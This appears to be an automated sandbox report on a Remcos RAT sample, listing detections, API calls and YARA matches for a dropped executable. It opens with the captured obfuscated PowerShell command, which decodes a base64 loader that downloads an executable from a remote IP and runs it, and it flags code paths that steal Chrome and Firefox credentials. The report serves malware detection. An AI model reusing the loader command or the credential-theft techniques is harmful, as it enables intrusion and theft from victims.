                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jhjiqvp5bkw1ug1uicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrfzkluavrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vti5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietidutvvmpvyuxllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbwwwzjlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbma0zht09rclbiuix1aw50icagicagicagicagicagicagicagicagicagicagicagifdzee9urlffzxassw50uhryicagicagicagicagicagicagicagicagicagicagicagiefowfepoycgicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicagimlsrfn1iiagicagicagicagicagicagicagicagicagicagicagicattmfnzxnqywnficagicagicagicagicagicagicagicagicagicagicagie5st0nzicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhjiqvp5bkw1ug1uojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc5lje2ni83ns9ly29tzs5leguilcikrw52okfquerbvefcbmljzxrvbwvldhlvdxn3zwvldc5leguildasmck7u1rbulqtu2xfrxaomyk7au52b0tflwvyufjlu1njb24gicagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxuawnldg9tzwv0ew91c3dlzwv0lmv4zsi='+[char]0x22+'))')))"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00433E0A cpuid 6_2_00433E0A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: EnumSystemLocalesW,6_2_004470AE
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,6_2_004510BA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004511E3
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,6_2_004512EA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_004513B7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,6_2_00447597
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoA,6_2_0040E679
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00450A7F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: EnumSystemLocalesW,6_2_00450CF7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: EnumSystemLocalesW,6_2_00450D42
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: EnumSystemLocalesW,6_2_00450DDD
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00450E6A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: EnumSystemLocalesW,6_2_007D1044
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,6_2_007D1321
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: EnumSystemLocalesW,6_2_007C7315
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_007D144A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,6_2_007D1551
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_007D161E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoW,6_2_007C77FE
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetLocaleInfoA,6_2_0078E8E0
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_007D0CE6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: EnumSystemLocalesW,6_2_007D0F5E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: EnumSystemLocalesW,6_2_007D0FA9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00404915 GetLocalTime,CreateEventA,CreateThread,6_2_00404915
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041A7A2 GetComputerNameExW,GetUserNameW,6_2_0041A7A2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00448057
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_2_0040B21B
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_2_0040B335
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: \key3.db6_2_0040B335

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GJDISHJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
